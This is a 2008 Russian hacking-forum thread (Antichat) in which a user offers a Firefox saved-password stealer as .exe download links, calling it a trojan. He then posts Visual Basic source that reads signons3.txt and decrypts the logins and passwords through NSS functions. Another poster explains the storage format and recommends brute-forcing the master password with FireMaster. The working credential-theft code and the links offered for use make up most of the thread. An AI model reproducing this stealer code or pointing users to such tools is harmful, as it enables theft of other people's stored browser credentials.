Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
20.12.2008, 00:07
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
p4ss f1nd3r for ff3!
Вобщем накодил на vb небольшую софтинку,прога "вспоминает" пароли от мозиллы,высвечивает урл,логин,пасс,дату,дизайн ака "Tроя жива"  критика уместна,если норм,то доработаю,переделаю,дополн ю,жду отзывов
вот собственно линк на нее:
http://rapidshare.com/files/174956221/ff_p4s_fuck3rz.exe.html
http://dump.ru/file/1338529
http://www.x2b.ru/get/17928
Чуть не забыл,tnx 2 Exlibris & xcedz & Jes(джесу за то что он такой душка) за помощь в придумывании мегохакерского названия для программы!)
#забыл сказать,
перед запуском сохраните ваши пароли
(на всякий случай),ато некоторые уже тестировали xDD
Последний раз редактировалось baltazar; 21.12.2008 в 13:25..
|
|
|
20.12.2008, 00:22
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Отлично, работает. Пасы только я не храню в фф ^^
|
|
|
|
20.12.2008, 00:27
|
|
Banned
Регистрация: 15.07.2007
Сообщений: 39
Провел на форуме:
1122110
Репутация:
43
|
|
Сообщение от baltazar
Чуть не забыл,гратц Екслибрис и икскеду за помощь в придумывании мегохакерского названия для программы!)
Gratz, gz — (англ. Congratulations) Поздравляю! (Поздравление с чем-либо)
|
|
|
|
20.12.2008, 00:33
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
-----
По сабжу. Добавляй по комбинации клавиш "сохранить в" все также в таком же стиле чтобы красиво было 
Последний раз редактировалось Jes; 20.12.2008 в 15:08..
Причина: ;)
|
|
|
|
20.12.2008, 15:48
|
|
Новичок
Регистрация: 27.09.2008
Сообщений: 15
Провел на форуме:
103874
Репутация:
20
|
|
А где мозила хранит пароли?
|
|
|
|
20.12.2008, 16:00
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
Код:
sFFPath = GetSpecialfolder(CSIDL_APPDATA) & "\Mozilla\Firefox\" & "profiles.ini"
sRet = Space(260)
Call GetPrivateProfileString("Profile0", "Path", vbNullString, sRet, 260, sFFPath)
sRet = Left$(sRet, lstrlen(sRet))
sFFPath = GetSpecialfolder(CSIDL_APPDATA) & "\Mozilla\Firefox\" & sRet & "\signons3.txt"
Open sFFPath For Binary Access Read As #1
sPass = Space(LOF(1))
Get #1, , sPass
Close #1
sRet = GetSpecialfolder(CSIDL_APPDATA) & "\Mozilla\Firefox\" & sRet
svEntry = Split(sPass, "." & vbCrLf)
bvRet = StrConv(sRet, vbFromUnicode)
If CallFunc("NSS_Init", StrPtr(bvRet)) = 0 Then
lKeySlot = CallFunc("PK11_GetInternalKeySlot")
If Not lKeySlot = 0 Then
If CallFunc("PK11_Authenticate", lKeySlot, True, 0) = 0 Then
For i = 1 To UBound(svEntry) - 1
svLines = Split(svEntry(i), vbCrLf)
Enumerate = Enumerate & " " & "URL: " & svLines(0) & vbCrLf
For j = 1 To UBound(svLines) - 3 Step 2
If Not svLines(j + 1) = "---" Then
Enumerate = Enumerate & " " & "Section: " & svLines(j) & vbCrLf
Enumerate = Enumerate & " " & "Value: " & svLines(j + 1) & vbCrLf
bvRet = StrConv(svLines(j + 1), vbFromUnicode)
Call CallFunc("NSSBase64_DecodeBuffer", 0, VarPtr(tSec), StrPtr(bvRet), Len(svLines(j + 1)))
If CallFunc("PK11SDR_Decrypt", VarPtr(tSec), VarPtr(tSecDec), 0) = 0 Then
If tSecDec.SECItemLen > 0 Then
ReDim bvRet(tSecDec.SECItemLen - 1)
CopyMemory bvRet(0), ByVal tSecDec.SECItemData, tSecDec.SECItemLen
Enumerate = Enumerate & " " & "Data: " & StrConv(bvRet, vbUnicode) & vbCrLf
End If
End If
End If
|
|
|
|
20.12.2008, 22:15
|
|
Постоянный
Регистрация: 05.05.2006
Сообщений: 743
Провел на форуме:
2982851
Репутация:
107
|
|
Мммм мозилла что действительно шифруют пароли в base64 ?
|
|
|
|
20.12.2008, 22:39
|
|
Новичок
Регистрация: 27.09.2008
Сообщений: 15
Провел на форуме:
103874
Репутация:
20
|
|
_nic
нет,там другое что-то
|
|
|
|
21.12.2008, 06:26
|
|
Участник форума
Регистрация: 22.11.2007
Сообщений: 159
Провел на форуме:
732568
Репутация:
156
|
|
эмм, а если мастер пароль стоит - всё равно пароли вытащит?
|
|
|
|
21.12.2008, 12:56
|
|
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279
Репутация:
2727
|
|
а давайте ценить свое и других время?
вопрос написали русским языком "А где мозила хранит пароли?", ты кинул сурс, но ведь можно было ответить нормально?
я не шарю в vb, но очевидно, что в profiles.ini ты берешь название папки с профилем и в той папке открываешь файл signons3.txt (криво открываешь - у меня создался пустой файл, т.к. фф2 и есть только signons2.txt). почему signons3.txt, а не signons2.txt ? мозилла 3 ?  так вот, погуглил бы вначале, а потом бы и изобретал велосипед. хешированные записи паролей хранятся в файлах signons*.txt, скорей всего для 3 мозиллы цифра 3, для 2 - 2, для 1 - просто signons.txt.
дальше пару цитат из перевода статьи Mikhael Felker`а "Механизмы управления паролями в IE и Firefox":
Структура хранилища: Текстовый файл (signons.txt)
Формат данных: ASCII, используя Base64 кодирование (кроме URL и полей)
URL (обычный текст, например www.gmail.com)
Field name (обычный текст, например username, email, userid и т.д..)
Зашифрованное и Base64 кодированное значение вышеописанной информации
Field name (например, password, pass,и т.д..)
Зашифрованное и Base64 кодированное значение вышеописанной информации
...и т.д.... (Может быть много данных для одного URL)
.
(Каждая запись заканчивается точкой)
Шифрование: TripleDES (CBC mode)
Доступ: Network Security Services (NSS) API
Требования к доступу: Авторизованный пользователь и Master Password (если установлен)
Дополнительные файлы: Сертификаты сохранены как certN.db, база данных частных ключей как keyN.db и Security Modules сохранены как secmod.db.
Firefox использует Network Security Services API для проведения криптографических операций. Поскольку это относится к менеджеру паролей, Firefox использует Public Key Cryptography Standard (PKCS) #11, который определяет API для аппаратных и программных модулей сторонних производителей. Также используется PKCS#5 для шифрования паролей. У Firefox также есть опция для использования альтернативного модуля для хранения паролей, совместимого со стандартом Federal Information Processing Standard (FIPS) 140-1. Master Password используется совместно с salt (находится в файле keyN.db) для получения Master Key. Затем Master Key используется для дешифрования имен пользователей, паролей, сохраненных в менеджере паролей.
NSS API имеет несколько функций, которые позволяют Firefox или подобным приложениям получить доступ к базе данных паролей. Установка пароля обрабатывается (PK11_SetPasswordFunc), декодируя Base64 данные (NSSBase64_DecodeBuffer) и дешифруя (PK11SDR_Decrypt), что позволяет соответствующим приложениям получить доступ к именам пользователей и соответствующим паролям. Безопасность всей системы зависит от криптографической стойкости Master Password (созданного пользователем) и доступности файла key3.db (который содержит salt), хранимого в пользовательском профиле.
у меня установлен Master Password и твоя тузла конечно же не сработала (подогнал свой signons2.txt под работоспособность твоего велосипеда).
Master Password надо брутить, брутится очень быстро. инструмент написан давно и доступен с исходниками - Firemaster.
Firemaster is the Firefox master password recovery tool. Firefox uses master password to protect the stored sign-on information for various websites. If the master password is forgotten, then there is no way to recover the master password and user has to lose all the sign-on information stored in it. To prevent this problem, I have developed FireMaster which uses combination of techniques such as dictionary, hybrid and brute force to recover the master password from the Firefox key database file.
ссылки по теме:
http://securityxploded.com/firemaster.php
http://securityxploded.com/firepassword.php
http://www.mozilla-russia.org/products/firefox/faq/
Механизмы управления паролями в IE и Firefox. Часть первая.
Механизмы управления паролями в IE и Firefox. Часть вторая.
http://www.mozilla.org/projects/security/pki/nss/
__________________
ПИУ-ПИУ...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
